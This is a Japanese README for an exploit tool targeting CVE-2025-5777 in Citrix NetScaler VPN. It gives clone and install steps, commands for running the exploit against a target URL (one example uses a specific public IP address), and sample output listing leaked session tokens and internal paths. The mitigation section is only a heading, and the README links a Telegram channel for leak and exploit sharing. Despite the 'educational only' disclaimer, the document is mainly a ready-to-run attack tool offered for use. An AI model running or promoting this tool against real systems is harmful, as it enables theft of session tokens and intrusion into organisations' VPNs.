
脆弱性 CVE-2025-5777(Citrix NetScaler VPN に影響)を実証・分析するための強力な教育ツールです。
このプロジェクトは GO-TO CVE イニシアチブの一部です。
⚠️ 教育目的のみ。所有していない、または明示的なテスト許可がないシステムでは使用しないでください。
このスクリプトは、脆弱な Citrix VPN エンドポイントによって露出した機密内部トークン、内部 IP、および非公開エンドポイントパスを検出・抽出しようとします。
学生、セキュリティ研究者、レッドチーム担当者が実際の CVE がどのように発見・分析されるかをより深く理解できるよう構築されています。
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Python 3.8+ が必要 オプション:仮想環境を使用可能
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 を追加して Burp/SOCKS 経由でルーティング--silent を追加して出力を抑制--output result.json を追加して JSON に保存例:
python3 exploit.py https://20.237.190.100 --output leaks.json
[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
および
この CVE の悪用を防ぐには:
このツールは教育および合法的な研究目的にのみ公開されています。 開発者は、このコードを使用した不正使用や違法行為について一切の責任を負いません。
本ツールを使用することで、以下に同意したものとみなされます:
CVE リークおよびエクスプロイト研究コミュニティに参加: 👉 https://t.me/GOTOCVE
開発者: Ali Soltani – レッドチームメンバー兼 CVE ハンター。
GO-TO CVE の誇りある一員。